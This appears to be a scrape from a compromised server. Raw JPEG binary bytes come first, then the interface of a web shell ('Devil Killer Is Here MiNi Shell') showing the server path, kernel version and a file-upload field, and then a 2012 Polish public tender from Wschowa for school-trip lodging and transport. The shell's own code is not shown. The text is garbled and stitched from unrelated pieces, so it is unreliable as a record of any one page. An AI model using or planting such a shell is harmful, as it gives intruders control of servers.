JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/102888-N-2012.html

<p class="kh_header"><b>Wschowa: Usługi zakwaterowania, wyżywienia oraz usługi transportowe na wycieczkach szkolnych w ramach projektu Lubuska Szkoła Równych Szans - III Edycja</b><br>
<b>Numer ogłoszenia: 102888 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy Wschowa , Rynek 1, 67-400 Wschowa, woj. lubuskie, tel. 65 5408600, faks 65 5401340.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zakwaterowania, wyżywienia oraz usługi transportowe na wycieczkach szkolnych w ramach projektu Lubuska Szkoła Równych Szans - III Edycja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie o wartości szacunkowej poniżej progów określonych w przepisach wydanych na podstawie art.11 ust.8 Pzp. Przedmiot zamówienia polega na świadczeniu usług zakwaterowania i wyżywienia oraz transportu podczas wycieczek szkolnych w ramach projektu Lubuska Szkoła Równych Szans - III Edycja. 
Przedmiot zamówienia obejmuje świadczenie wskazanych usług podczas następujących wycieczek szkolnych:
1. wycieczka ze Wschowy do Gdańska;
2. wycieczka ze Wschowy do Krakowa;
3. wycieczka z Osowej Sieni do Kołobrzegu;
4. wycieczka z Osowej Sieni do Krakowa;
5. wycieczka z Konradowa do Karpacza.
6. wycieczka z Konradowa do Krakowa;
7. wycieczka z Siedlnicy do Trójmiasta;
8. wycieczka z Siedlnicy do Warszawy;

Zamawiający podzielił zamówienie na 16 części.
Szczegółowy opis usługi zakwaterowania, wyżywienia i transportu zawiera SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dla części I, III, V, VII, IX, XI, XIII, XV zamówienia - nie precyzuje się, ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie.

b) dla części II, IV, VI, VIII, X, XII, XIV, XVI zamówienia - posiadanie ważnej licencji na przewóz osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:
Wykonywał lub wykonuje w przypadku usług okresowych i ciągłych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej:
a) dla części I, III, V, VII, IX, XI, XIII, XV zamówienia:
- 2 usługi zakwaterowania wraz 
z wyżywieniem grup zorganizowanych o wartości co najmniej 10.000,00 złotych brutto każda;

b) dla części II, IV, VI, VIII, X, XII, XIV, XVI zamówienia:
- 2 usługi transportu dalekobieżnego grup zorganizowanych o wartości co najmniej 5.000,00 złotych brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki dotyczące dysponowania odpowiednim potencjałem technicznym:
a) dla części   I, III, V, VII, IX, XI, XIII, XV zamówienia- nie precyzuje się, Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie.
b) dla części II, IV, VI, VIII, X, XII, XIV, XVI zamówienia-Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje wyposażonymi w klimatyzację, w pełni technicznie sprawnymi, dopuszczonymi do ruchu pojazdami przystosowanymi do przewozu grup zorganizowanych, posiadającymi wystarczającą ilość miejsc siedzących, zapewniających przewóz zaplanowanej ilości uczestników na danej trasie zgodnie z częściami zamówienia. 

Wymagania minimalne:

a) Cześć 2-  1 autokar 
b) Część 4-  1 autokar
c) Część 6-  1  autokar
d) Część 8-  1  autokar
e) Część 10-  1  autokar
f)  Część 12-  1  autokar
g) Część 14-  1  autokar
h) Część 16 -  1 autokar
W przypadku składania ofert na więcej niż jedną część  tzn. na część 2 i 4, 
6 i 10, lub 8 i 12 - Wykonawca musi udokumentować dysponowanie minimum 2 autokarami spełniającymi w/w wymagania.

Pojazdy  przewidziane do przewozu uczniów winny posiadać aktualne badanie techniczne, a ich stan techniczny winien spełniać określone wymagania zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2003 r. Nr 32 poz.262).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia dla każdej części zamówienia:
a) dla części   I, III, V, VII, IX, XI, XIII, XV zamówienia- nie precyzuje się. Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie;

b) dla części II, IV, VI, VIII, X, XII, XIV, XVI zamówienia-Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje dla potrzeb niniejszego zamówienia odpowiednią ilością kierowców dla poszczególnych części zamówienia, zgodnie z obowiązującymi przepisami prawa. 
Wymagania minimalne:
a) Cześć 2-  1 kierowca
b) Część 4-  1 kierowca
c) Część 6-  1 kierowca
d) Część 8-  1 kierowca
e) Część 10-  1 kierowca
f) Część 12-  1 kierowca
g) Część 14-  1 kierowca
h) Część 16-  1 kierowca 

-których praca będzie świadczona zgodnie z ustawą o czasie pracy kierowców z dnia 16.04.2004 r. (Dz.U.2004, Nr 92, poz. 879, ze zm.), 
- posiadających kwalifikacje zawodowe do przewozu osób i kierowania autobusami, spełniających wymagania określone w przepisach ustawy z dnia 
6 września 2001 r. o transporcie drogowym, przepisach ustawy z dnia 
20 czerwca 1997 r. - Prawo o ruchu drogowym, oraz innych przepisach określających wymagania w stosunku do kierowców, 
-z co najmniej 2 letnim doświadczeniem związanym z przewozem grup zorganizowanych.
W przypadku składania ofert na więcej niż jedną część  tzn. na część 2 i 4 lub 6 i 10, lub 8 i 12 - Wykonawca musi udokumentować dysponowanie minimum 2 osobami spełniającymi w/w wymagania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się. Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Dla części I, III,V,VII,IX,XI,XIII,XV zamówienia:
a. opinia właściwej miejscowo komendy powiatowej (miejskiej) Państwowej Straży Pożarnej wydanej właścicielowi, zarządcy lub użytkownikowi obiektu lub protokół okresowej kontroli Państwowej Straży Pożarnej;
b. pozytywna opinia właściwej miejscowo powiatowej stancji sanitarno - epidemiologicznej;
2. Dla części II, IV, VI, VIII, X, XII, XIV, XVI zamówienia:
a. aktualne badania techniczne autokarów.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie wykonawcy, że: zaproponowany środek transportu jest  technicznie sprawny i posiada aktualny przegląd techniczny dopuszczający do ruchu oraz, że jego stan techniczny odpowiada wymaganiom zawartym w rozporządzeniu Ministra Infrastruktury, o którym mowa w Warunkach pkt III SIWZ,   jak również spełnia wymagania określone przez Zamawiającego w siwz. (dot. części 2,4,6,8,10,12,14,16 zamówienia);
2. Pełnomocnictwo w formie pisemnej do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotna zmiana umowy jest niedopuszczalna, za wyjątkiem okoliczności wskazanych w umowach, których wzór stanowi załącznik nr 7 i 8 do SIWZ, a w szczególności:
- zmiany terminu realizacji umowy, w przypadku wystąpienia okoliczności niemożliwych uprzednio do przewidzenia, a niezależnych od Stron;
- zmiany sposobu wykonywania umowy, w przypadku wystąpienia okoliczności niemożliwych uprzednio do przewidzenia, a niezależnych od Stron;
- zmiany wynagrodzenia, w zakresie w jakim wynikać będzie to ze zmiany obowiązującego prawa;
- zmiany ilości osób korzystających z usług wraz ze zmianą warunków wykonywania usługi i zmianą wynagrodzenia z tej racji wynikającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wschowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy we Wschowie, ul. Rynek 1, 67-400 Wschowa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy we Wschowie, ul. Rynek 1, 67-400 Wschowa, pokój nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowanie przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach: Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ NR 2 WE WSCHOWIE PODCZAS WYCIECZKI SZKOLNEJ DO GDAŃSKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej nr 2 we Wschowie podczas wycieczki do Gdańska. 
Termin realizacji zamówienia: 
od 28.04.2012 r.  do 01.05.2012 r. 4 dni (3 noclegi)
Zakwaterowanie: 
Miejsce zakwaterowania: Gdańsk lub jego okolice położone do 
20 km od granic miasta. 
Planowana ilość osób do zakwaterowania: 45 (40 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 45 (40 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ NR 2 WE WSCHOWIE PODCZAS WYCIECZKI SZKOLNEJ DO GDAŃSKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 28.04.2012 r.  do 01.05.2012 r. 4 dni (3 noclegi)

Miejsce wykonania obejmuje trasę docelową, powrotną: Wschowa-Gdańsk- Wschowa oraz trasę dot. realizacji programu wycieczki.
Trasa: Wschowa - Gdańsk - Wschowa - około 900 km
Jazdy lokalne: około 400 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ NR 2 
WE WSCHOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej nr 2 we Wschowie podczas wycieczki do Krakowa. 

Termin realizacji zamówienia: 
od 28.04.2012 r.  do 01.05.2012 r. 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Kraków 

Planowana ilość osób do zakwaterowania: 45 (40 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 45 (40 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ NR 2 WE WSCHOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 28.04.2012 r.  do 01.05.2012 r. 4 dni (3 noclegi)

Miejsce wykonania obejmuje trasę docelową, powrotną: Wschowa-Kraków- Wschowa oraz trasę dot. realizacji programu wycieczki. 
Trasa: Wschowa - Kraków - Wschowa - około 840 km
Jazdy lokalne: około 400 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> USLUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W OSOWEJ SIENI PODCZAS WYCIECZKI SZKOLNEJ DO KOŁOBRZEGU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Osowej Sieni podczas wycieczki do Kołobrzegu. 

Termin realizacji zamówienia: 
od 07.06.2012 r. do 10.06.2012 r.- 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Kołobrzeg - część północna ( lewy lub prawy brzeg Parsęty) lub okolice centrum

Planowana ilość osób do zakwaterowania: 50 (45 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 

Planowana ilość osób do wyżywienia: 50 (45 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
